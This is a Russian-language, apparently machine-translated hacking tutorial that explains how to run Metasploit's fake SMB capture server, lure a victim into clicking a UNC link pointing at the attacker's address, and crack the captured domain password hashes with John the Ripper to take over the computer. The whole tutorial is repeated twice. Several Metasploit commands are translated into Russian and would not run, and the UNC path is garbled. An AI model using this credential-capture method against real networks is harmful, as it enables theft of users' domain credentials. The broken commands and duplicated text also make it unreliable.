В предыдущих уроках серии «Основы Metasploit» мы узнали, как использовать hashdump для извлечения хешей паролей из локальной системы. В разделе «Взлом паролей с помощью Hashcat» вы узнали, как взламывать эти хеши с помощью Hashcat.
В каждом из этих случаев хэши паролей представляли собой пароли пользователей локальной системы, а не домена. Если система входит в домен (что характерно для большинства корпораций и крупных организаций), пароли, скорее всего, хранятся на контроллере домена (DC). Как получить пароли домена, не атакуя защищённый контроллер домена?
Одна из наиболее мощных функций Metasploit — это возможность создания поддельного SMB-сервера . Это означает, что при попытке доступа к SMB-серверу система должна будет предоставить учётные данные в виде хеша пароля домена. В крупных сетях часто используется система, которая систематически подключается к каждой машине, чтобы проверить наличие обновлений и безопасность. При этом она должна предоставить свои учётные данные каждой системе, и обычно это будет пароль администратора. Если проявить терпение, это может оказаться оптимальной стратегией.
Кроме того, настроив этот поддельный SMB-сервер, мы сможем перехватывать учётные данные домена при попытке пользователей пройти аутентификацию. Мы могли бы отправить целевой странице встроенный UNC-путь, и когда пользователь нажмёт на него, мы могли бы перехватить учётные данные домена.
В отличие от некоторых других наших атак Metasploit, эта не является ни эксплойтом, ни полезной нагрузкой. Это вспомогательный модуль, способный захватить хеш в формате, который можно взломать с помощью Cain and Abel, очень мощного, но медленного взломщика паролей для Windows, или John the Ripper, вероятно, старейшего взломщика паролей, всё ещё представленного на рынке.
Шаг 1: Запустите Kali и Metasploit
Давайте начнем с запуска Kali и откроем один из моих любимых хакерских инструментов, Metasploit, введя:
kali > msfconsole
Когда мы это делаем, нас встречает очень знакомый экран-заставка Meatsploit.
Шаг 2: Настройка SMB-сервера
Теперь, когда Metasploit открыт, давайте настроим поддельный SMB-сервер. В отличие от некоторых других наших атак Metasploit, эта не является ни эксплойтом, ни полезной нагрузкой, а скорее вспомогательным модулем. Запустить её можно, введя:
msf > использовать вспомогательный/сервер/захват/smb
Теперь, когда мы загрузили этот модуль, давайте рассмотрим параметры, которые нам необходимо настроить для использования этого модуля.
msf >показать параметры
Как видите, этот модуль имеет множество опций, но мы можем оставить настройки по умолчанию для каждой из них, за исключением типа файла для хранения хешей для взлома.
Обратите внимание, я выделил выше параметр JOHNPWFILE. Также на самом верху есть параметр CAINPWFILE. Эти параметры позволяют определить формат файла, в котором хранятся хеши для взлома Каином и Авелем или Иоанном Потрошителем. В этом руководстве я буду использовать последний инструмент.
Для этого мне просто нужно указать этому модулю «установить» JOHNPWFILE в определенном месте, введя:
msf > set JOHNPWFILE /root/domainhashes
Теперь осталось только «эксплуатировать».
msf > эксплуатировать
Когда мы набираем «exploit», этот модуль запускает поддельный SMB-сервер, который будет сохранять предоставленные учетные данные в каталоге /root в файлах, начинающихся с «johnhashes».
Шаг 3: Поделиться
Теперь, когда наш SMB-сервер запущен, нам нужно, чтобы кто-то попытался войти в наш общий ресурс. Мы можем сделать это, отправив UNC-ссылку на наш общий ресурс, например:
net use \192.168.1.106occumptheweb
Когда они нажмут на эту ссылку, их учетные данные домена будут представлены нашему SMB-серверу и сохранены, как показано на снимке экрана ниже.
Шаг 4: Взломать хэш
Последний шаг — взломать хеши для получения пароля. Перейдите в каталог /root, чтобы найти сохранённые файлы хешей.
кали > cd /root
Как видите, здесь хранятся два хеша. Чтобы их взломать, можно воспользоваться John the Ripper (он встроен в Kali), набрав:
kali > john johnhashes_netlmv2
Когда мы это сделаем, Джон Потрошитель загрузит хеш пароля, распознает тип хеша и начнёт его взлом. В зависимости от длины и сложности пароля, Джону потребуется от нескольких минут до нескольких дней, чтобы взломать хеш, но после этого вы получите пароль пользователя, перешедшего по вашей UNC-ссылке, и сможете полностью управлять компьютером!
В каждом из этих случаев хэши паролей представляли собой пароли пользователей локальной системы, а не домена. Если система входит в домен (что характерно для большинства корпораций и крупных организаций), пароли, скорее всего, хранятся на контроллере домена (DC). Как получить пароли домена, не атакуя защищённый контроллер домена?
Одна из наиболее мощных функций Metasploit — это возможность создания поддельного SMB-сервера . Это означает, что при попытке доступа к SMB-серверу система должна будет предоставить учётные данные в виде хеша пароля домена. В крупных сетях часто используется система, которая систематически подключается к каждой машине, чтобы проверить наличие обновлений и безопасность. При этом она должна предоставить свои учётные данные каждой системе, и обычно это будет пароль администратора. Если проявить терпение, это может оказаться оптимальной стратегией.
Кроме того, настроив этот поддельный SMB-сервер, мы сможем перехватывать учётные данные домена при попытке пользователей пройти аутентификацию. Мы могли бы отправить целевой странице встроенный UNC-путь, и когда пользователь нажмёт на него, мы могли бы перехватить учётные данные домена.
В отличие от некоторых других наших атак Metasploit, эта не является ни эксплойтом, ни полезной нагрузкой. Это вспомогательный модуль, способный захватить хеш в формате, который можно взломать с помощью Cain and Abel, очень мощного, но медленного взломщика паролей для Windows, или John the Ripper, вероятно, старейшего взломщика паролей, всё ещё представленного на рынке.
Шаг 1: Запустите Kali и Metasploit
Давайте начнем с запуска Kali и откроем один из моих любимых хакерских инструментов, Metasploit, введя:
kali > msfconsole
Когда мы это делаем, нас встречает очень знакомый экран-заставка Meatsploit.
Шаг 2: Настройка SMB-сервера
Теперь, когда Metasploit открыт, давайте настроим поддельный SMB-сервер. В отличие от некоторых других наших атак Metasploit, эта не является ни эксплойтом, ни полезной нагрузкой, а скорее вспомогательным модулем. Запустить её можно, введя:
msf > использовать вспомогательный/сервер/захват/smb
Теперь, когда мы загрузили этот модуль, давайте рассмотрим параметры, которые нам необходимо настроить для использования этого модуля.
msf >показать параметры
Как видите, этот модуль имеет множество опций, но мы можем оставить настройки по умолчанию для каждой из них, за исключением типа файла для хранения хешей для взлома.
Обратите внимание, я выделил выше параметр JOHNPWFILE. Также на самом верху есть параметр CAINPWFILE. Эти параметры позволяют определить формат файла, в котором хранятся хеши для взлома Каином и Авелем или Иоанном Потрошителем. В этом руководстве я буду использовать последний инструмент.
Для этого мне просто нужно указать этому модулю «установить» JOHNPWFILE в определенном месте, введя:
msf > set JOHNPWFILE /root/domainhashes
Теперь осталось только «эксплуатировать».
msf > эксплуатировать
Когда мы набираем «exploit», этот модуль запускает поддельный SMB-сервер, который будет сохранять предоставленные учетные данные в каталоге /root в файлах, начинающихся с «johnhashes».
Шаг 3: Поделиться
Теперь, когда наш SMB-сервер запущен, нам нужно, чтобы кто-то попытался войти в наш общий ресурс. Мы можем сделать это, отправив UNC-ссылку на наш общий ресурс, например:
net use \192.168.1.106occumptheweb
Когда они нажмут на эту ссылку, их учетные данные домена будут представлены нашему SMB-серверу и сохранены, как показано на снимке экрана ниже.
Шаг 4: Взломать хэш
Последний шаг — взломать хеши для получения пароля. Перейдите в каталог /root, чтобы найти сохранённые файлы хешей.
кали > cd /root
Как видите, здесь хранятся два хеша. Чтобы их взломать, можно воспользоваться John the Ripper (он встроен в Kali), набрав:
kali > john johnhashes_netlmv2
Когда мы это сделаем, Джон Потрошитель загрузит хеш пароля, распознает тип хеша и начнёт его взлом. В зависимости от длины и сложности пароля, Джону потребуется от нескольких минут до нескольких дней, чтобы взломать хеш, но после этого вы получите пароль пользователя, перешедшего по вашей UNC-ссылке, и сможете полностью управлять компьютером!
